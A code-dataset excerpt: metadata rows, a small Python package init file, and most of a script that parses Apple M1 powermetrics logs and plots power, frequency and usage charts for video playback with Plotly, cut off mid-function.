| 0.829537
| 0.800795
| 0.787189
| 0.77664
| 0.77664
| 0
| 0.021951
| 0.270708
| 11,119
| 337
| 79
| 32.994065
| 0.784684
| 0.010433
| 0
| 0.716418
| 0
| 0
| 0.171623
| 0.148704
| 0
| 0
| 0
| 0
| 0.037313
| 1
| 0.093284
| false
| 0.014925
| 0.029851
| 0
| 0.123134
| 0.003731
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ca03895a92271b94a3bef78a065c4c5459a61372
| 49
|
py
|
Python
|
models/__init__.py
|
zhxtu/ours_video
|
2762501e4d3795872ffabc49fa3c73fdde10af8b
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
zhxtu/ours_video
|
2762501e4d3795872ffabc49fa3c73fdde10af8b
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
zhxtu/ours_video
|
2762501e4d3795872ffabc49fa3c73fdde10af8b
|
[
"MIT"
] | null | null | null |
from .model import CAC
from .model_vid import VCL
| 24.5
| 26
| 0.816327
| 9
| 49
| 4.333333
| 0.666667
| 0.461538
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 49
| 2
| 26
| 24.5
| 0.928571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ca450182bb7a34f853d42534c6701c35ca42fbda
| 76,697
|
py
|
Python
|
powermetrics-parse.py
|
wolruf/apple-m1-power-consumption-powermetrics
|
cdd8e6ed9f3f076f52221a5bc4f848e79ffa65e1
|
[
"MIT"
] | null | null | null |
powermetrics-parse.py
|
wolruf/apple-m1-power-consumption-powermetrics
|
cdd8e6ed9f3f076f52221a5bc4f848e79ffa65e1
|
[
"MIT"
] | null | null | null |
powermetrics-parse.py
|
wolruf/apple-m1-power-consumption-powermetrics
|
cdd8e6ed9f3f076f52221a5bc4f848e79ffa65e1
|
[
"MIT"
] | null | null | null |
#!./bin/python3
import os
import subprocess
import re
import csv
import plotly.express as px
import plotly.graph_objects as go
from plotly.subplots import make_subplots
import plotly.io as pio
import pandas as pd
import numpy as np
import time
import plotly.figure_factory as ff
from PIL import Image
def regexParse(content, videoType):
    """Parse a `powermetrics` log dump into three aligned dataframes.

    Parameters
    ----------
    content : str
        Full text of a powermetrics capture.
    videoType : str
        Label stored in the 'Video Type' column of every returned frame.

    Returns
    -------
    tuple of pandas.DataFrame
        (dfPower, dfFrequency, dfUsage): power in mW, HW active frequency
        in MHz, and active residency in percent, one row per sample.
    """
    # Declare local dataframes
    dfPower, dfFrequency, dfUsage = pd.DataFrame(), pd.DataFrame(), pd.DataFrame()

    def _int_series(pattern):
        # The regexes accept a decimal point ([\d.]+), so convert through
        # float first: plain int('14.5') would raise ValueError.
        return pd.Series([int(float(m)) for m in re.findall(pattern, content)])

    def _float_series(pattern):
        return pd.Series([float(m) for m in re.findall(pattern, content)])

    dfPower['Efficiency Cluster'] = _int_series(r'E-Cluster Power:\s*([\d.]+)\s*mW')
    dfFrequency['Efficiency Cluster'] = _int_series(r'E-Cluster HW active frequency:\s*([\d.]+)\s*MHz')
    dfUsage['Efficiency Cluster'] = _float_series(r'E-Cluster HW active residency:\s*([\d.]+)%')
    dfPower['Performance Cluster'] = _int_series(r'P-Cluster Power:\s*([\d.]+)\s*mW')
    dfFrequency['Performance Cluster'] = _int_series(r'P-Cluster HW active frequency:\s*([\d.]+)\s*MHz')
    dfUsage['Performance Cluster'] = _float_series(r'P-Cluster HW active residency:\s*([\d.]+)%')
    dfPower['DRAM'] = _int_series(r'DRAM Power:\s*([\d.]+)\s*mW')
    dfPower['Cluster'] = _int_series(r'Clusters Total Power:\s*([\d.]+)\s*mW')
    dfPower['Package'] = _int_series(r'Package Power:\s*([\d.]+)\s*mW')
    # Anchored on the following 'Package Power' line so unrelated per-process
    # 'GPU Power' entries elsewhere in the log are not captured.
    dfPower['GPU'] = _int_series(r'GPU Power:\s*([\d.]+)\s*mW\nPackage Power')
    dfFrequency['GPU'] = _int_series(r'GPU active frequency:\s*([\d.]+)\s*MHz')
    dfUsage['GPU'] = _float_series(r'GPU active residency:\s*([\d.]+)%')
    # Other components power needs to be extracted out of total package power
    # e.g. result from logs
    #   DRAM Power: 14 mW
    #   Clusters Total Power: 30 mW
    #   GPU Power: 14 mW
    #   Package Power: 99 mW
    dfPower['Other'] = dfPower['Package'] - (dfPower['Cluster'] + dfPower['DRAM'] + dfPower['GPU'])
    # Check if the number of datapoints from all sections are equal; only
    # annotate with time / Video Type when the frames line up.
    if ((len(dfPower) != len(dfFrequency)) or (len(dfPower) != len(dfUsage))
            or (len(dfUsage) != len(dfFrequency))):
        print("The lengths of the dataframes are not equal. Check the regexes.")
    else:
        dataPoints = len(dfPower)
        dfPower['time'] = dfFrequency['time'] = dfUsage['time'] = list(range(1, dataPoints + 1))
        dfPower['Video Type'] = dfFrequency['Video Type'] = dfUsage['Video Type'] = [videoType] * dataPoints
    return dfPower, dfFrequency, dfUsage
def buildVLCCharts(dfPower, dfFrequency, dfUsage, config, kLogo):
fig = px.area(dfPower.loc[dfPower["Video Type"].isin(["4K-VP9-TEST", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Package'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", facet_col_wrap = 5,
labels={"value": "Power Consumption (mW)", "time": "Time (s)"}, color_discrete_map={"Package": "#57FFBC"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_layout(autosize = True, hovermode="x",
showlegend = False, font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Total Package Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=0.79, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.17,
sizex=0.2, sizey=0.2,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-power-package.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-package.svg")
# Figure for Total Power Over Time
fig = px.line(dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark',
width = 700, height = 1000, facet_row='Video Type', line_shape= "spline", render_mode = "svg",
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence=px.colors.sequential.YlOrRd,
# color_discrete_map={
# "Efficiency Cluster": "#AA0EFE",
# "Performance Cluster": "#1CBE50",
# "DRAM": "#57FFBC",
# "GPU": "#2ED9FF",
# # "Other": "rgb(95, 70, 144)"
# "Other": "#FBE426"
# },
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels = {"value": "Power Consumption (mW)", "time": "Time (s)"},
category_orders = {"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
# print(annotation)
annotation['textangle'] = 0
annotation['xanchor'] = 'right'
annotation['x'] = annotation['x'] - 0.002
annotation['y'] = annotation['y'] + 0.038
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=13)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
# fig.update_traces(hovertemplate='%{y} (mW)', line_smoothing = 1.3)
fig.update_traces(hovertemplate='%{y} (mW)')
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Power Consumption over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.97,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'left', yanchor = 'top',
x=0.01, y=0.965, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.119, y=1.038,
sizex=0.065, sizey=0.065,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-total.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-total.svg")
# Figure for Total Power Over Time
fig = px.line(dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'],
width = 700, height = 1000, facet_row='Video Type', render_mode = "svg")
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-total-2.html", include_plotlyjs="cdn")
# BAR CHART FOR Averages by component
# Pull out only the non-browser video types
barDf = (dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
# Now use the filtered columns to create the bar chart
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 400, barmode = 'group',
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0"
},
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.update_yaxes(title_font = dict(size=12), title_font_color = "#707070", color="#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424') #, range=[0, 1100])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.11, 0.11, 0.11, 0.11, 0.11])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.93,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['DRAM'], barDf['GPU'], barDf['Other']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
# fig.update_traces(texttemplate='%{text:.2s}', textposition='outside')
# fig.update_layout(uniformtext_minsize=7, uniformtext_mode='hide')
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.12,
sizex=0.145, sizey=0.145,
xanchor="left", yanchor="bottom"
)
)
# Update just the layout properites with relatout method e.g. barmode
# fig.update_layout(
# updatemenus=[
# dict(
# type="buttons",
# buttons=[
# dict(label="Grouped",
# method="relayout",
# args = [{"barmode": "group"} ]),
# dict(label="Stacked",
# method="relayout",
# args = [{"barmode": "stack"}, {"autosize": "True"} ])
# ]
# )
# ]
# )
# TODO: Figure out the fix for https://github.com/plotly/plotly.py/issues/3120
# Update the Layout + Trace properties
# fig.update_layout(
# updatemenus=[
# dict(
# type="dropdown",
# # direction="right",
# active=0,
# x=1.035,
# y=1.27,
# showactive = True,
# buttons=list([
# dict(label="Grouped",
# method="update",
# args=[{"width": [0.11]},
# {"barmode": "group"}]),
# dict(label="Stacked",
# method="update",
# args=[{"width": [0.6]},
# {"barmode": "stack"}])
# ]),
# bgcolor = "#222",
# bordercolor = "#FFF",
# borderwidth = 0.5
# )
# ])
# fig.add_annotation(text="Bar Mode:",
# xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
# x=0.89, y=1.25, showarrow=False, opacity=0.8, font=dict(size=13))
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.86, showarrow=False, font=dict(size=14, color='#707070'))
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average.svg")
# HORIZONTAL BAR CHART FOR Total Average
barDf = (dfPower.loc[dfPower["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, y='Video Type', x=['Package'], template='plotly_dark', orientation='h', hover_name = 'Video Type', width = 700, height = 250, #barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={"Package": "#57FFBC"},
labels={"value": "Power Consumption (mW)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-VP9", "FHD-H264"]})
fig.update_xaxes(zeroline = True, title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_yaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{x:.0f} (mW)', texttemplate='%{x:.0f} mW', textfont= dict(size=11))
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
showlegend = False, font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Power Consumption</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.90,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 15, t = 60),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#181F26',
paper_bgcolor ='#181F26'
)
texts = [barDf['Package']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'inside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.17, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.165, y=1.099,
sizex=0.29, sizey=0.29,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-power-average-total.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-power-average-total.svg")
# Figure for CPU, GPU Frequency over time
fig = px.line(dfFrequency.loc[dfFrequency["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)", "time": "Time (s)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424')
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y} MHz', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Frequency over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=0.83, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-frequency.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency.svg")
# BAR CHART FOR Averages by component
barDf = (dfFrequency.loc[dfFrequency["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Frequency (MHz)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 1650])
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (Hz)', texttemplate='%{y:.0f}', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Frequency</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.96, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-frequency-average.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-frequency-average.svg")
# Figure for CPU, GPU Usage over time
fig = px.line(dfUsage.loc[dfUsage["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])], x='time', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark',
width = 700, height = 350, facet_col='Video Type', line_shape= "spline", render_mode = "svg", facet_col_wrap = 5,
# color_discrete_sequence = px.colors.qualitative.G10,
# color_discrete_sequence= px.colors.sequential.Burgyl,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)", "time": "Time (s)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
for annotation in fig['layout']['annotations']:
annotation['font'] = dict(family="SF Pro Display, Roboto, Droid Sans, Arial", size=11)
fig.update_yaxes(type='linear', title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', ticksuffix = "%")
fig.update_xaxes(showgrid=False, title_font = dict(size=10), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9))
fig.update_traces(hovertemplate='%{y:.0f} %', line_smoothing = 1.3)
fig.update_layout(legend_title_text='', autosize = True, hovermode="x",
legend=dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Usage over Time</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 50, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=1, y=0.9, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.125, y=1.19,
sizex=0.22, sizey=0.22,
xanchor="left", yanchor="bottom"
)
)
fig.write_html("outputs/plotly-usage.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage.svg")
# BAR CHART FOR Averages by component
barDf = (dfUsage.loc[dfUsage["Video Type"].isin(["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"])]).groupby(['Video Type']).mean().reset_index()
fig = px.bar(barDf, x='Video Type', y=['Efficiency Cluster', 'Performance Cluster', 'GPU'], template='plotly_dark', orientation='v', hover_name = 'Video Type',
width = 700, height = 350, barmode = 'group',
# color_discrete_sequence=px.colors.sequential.Blugrn,
# color_discrete_sequence=px.colors.qualitative.Set1,
color_discrete_map={
"Efficiency Cluster": "#73A4FF",
"Performance Cluster": "#FF715A",
"DRAM": "#C590FF",
"GPU": "#01F0B0",
"Other": "#FEAF73"
},
labels={"value": "Usage (%)"},
category_orders={"Video Type": ["4K-VP9", "4K-AV1", "FHD-AV1", "FHD-H264", "FHD-VP9"]})
fig.update_yaxes(title_font = dict(size=12), color="#707070", title_font_color = "#707070", tickfont = dict(size = 9), gridcolor='#242424', zerolinecolor = '#242424', range=[0, 29], ticksuffix = "%")
fig.update_xaxes(zeroline = True, showgrid=False, color="#FFF", title_font_color = "#707070", tickfont = dict(size = 11), title_text='')
fig.update_traces(hovertemplate='%{y:.0f} (%)', texttemplate='%{y:.0f} %', textfont= dict(size=8), width=[0.15, 0.15, 0.15, 0.15, 0.15])
fig.update_layout( autosize = True, hovermode=False, legend_title_text='',
legend=dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5),
font = dict(family="SF Pro Display, Roboto, Droid Sans, Arial"),
title={
'text': "<b>Average Usage</b> <br> <sup> Apple Mac Mini M1 | VLC 3.0.12.1 (local files) | MacOS 11.2.2 </sup>",
'y':0.92,
'x':0.54,
'xanchor': 'center',
'yanchor': 'top',
'font': dict(size=18, color='#FFF')},
margin = dict(r = 30, b = 0, t = 80),
margin_pad = 10,
modebar = dict(orientation = 'v'),
plot_bgcolor='#191C1F',
paper_bgcolor ='#191C1F'
)
texts = [barDf['Efficiency Cluster'], barDf['Performance Cluster'], barDf['GPU']]
for i, t in enumerate(texts):
fig.data[i].text = t
fig.data[i].textposition = 'outside'
fig.add_annotation(text="//singhkays.com",
xref="paper", yref="paper", xanchor = 'right', yanchor = 'top',
x=0.99, y=0.96, showarrow=False, font=dict(size=14, color='#707070'))
fig.add_layout_image(
dict(
source=kLogo,
xref="paper", yref="paper",
x=-0.12, y=1.15,
sizex=0.18, sizey=0.18,
xanchor="left", yanchor="bottom"
)
)
#fig.write_image("plotly-power.svg")
fig.write_html("outputs/plotly-usage-average.html", include_plotlyjs="cdn", config = config)
fig.write_image("outputs/plotly-usage-average.svg")
def buildYouTubeCharts(dfPower, dfFrequency, dfUsage, config, kLogo):
    """Build and export the YouTube 4K VP9 browser-comparison charts.

    Produces eight Plotly figures comparing VLC software decode against
    Safari/Chrome hardware and software decode: package power over time,
    per-component power over time, average power (per component and total),
    frequency over time, average frequency, usage over time, and average
    usage.  Each figure is written to ``outputs/`` as both an interactive
    HTML file and a static SVG.

    Parameters
    ----------
    dfPower, dfFrequency, dfUsage : pandas.DataFrame
        Time-series samples with a "Video Type" label column.  NOTE: the
        "Video Type" values are renamed IN PLACE (``inplace=True``), so the
        caller's frames are mutated.
    config : dict
        Plotly figure config forwarded to ``write_html``.
    kLogo :
        Image source accepted by plotly's ``add_layout_image``.
    """
    # --- shared styling constants -------------------------------------
    font_family = "SF Pro Display, Roboto, Droid Sans, Arial"
    subtitle = "Apple Mac Mini M1 | YouTube VP9 4K SDR | MacOS 11.2.2"
    component_colors = {
        "Efficiency Cluster": "#73A4FF",
        "Performance Cluster": "#FF715A",
        "DRAM": "#C590FF",
        "GPU": "#01F0B0",
        "Other": "#FEAF73"
    }
    package_color = {"Package": "#57FFBC"}
    browsers = ["VLC-SW", "Safari-HW", "Chrome-HW", "Chrome-SW"]
    components = ['Efficiency Cluster', 'Performance Cluster', 'DRAM', 'GPU', 'Other']
    clusters = ['Efficiency Cluster', 'Performance Cluster', 'GPU']
    legend_above = dict(orientation="h", yanchor="bottom", y=1, xanchor="center", x=0.5)
    legend_below = dict(orientation="h", yanchor="top", y=-0.3, xanchor="center", x=0.5)

    # --- small local helpers (all behavior-preserving) ----------------
    def _title(text, y):
        # Title markup matches the other chart builders in this file.
        return {'text': "<b>" + text + "</b> <br> <sup> " + subtitle + " </sup>",
                'y': y, 'x': 0.54, 'xanchor': 'center', 'yanchor': 'top',
                'font': dict(size=18, color='#FFF')}

    def _base_layout(fig, title_text, title_y, margin, **kwargs):
        # Common dark-theme layout shared by every chart in this builder.
        fig.update_layout(autosize=True, font=dict(family=font_family),
                          title=_title(title_text, title_y), margin=margin,
                          margin_pad=10, modebar=dict(orientation='v'),
                          plot_bgcolor='#191C1F', paper_bgcolor='#191C1F',
                          **kwargs)

    def _facet_labels(fig, size=11):
        # Strip the "Video Type=" prefix plotly puts on facet titles.
        fig.for_each_annotation(lambda a: a.update(text=a.text.split("=")[-1]))
        for annotation in fig['layout']['annotations']:
            annotation['font'] = dict(family=font_family, size=size)

    def _style_time_axes(fig, **extra_y):
        # Axis styling shared by the over-time (facet column) charts.
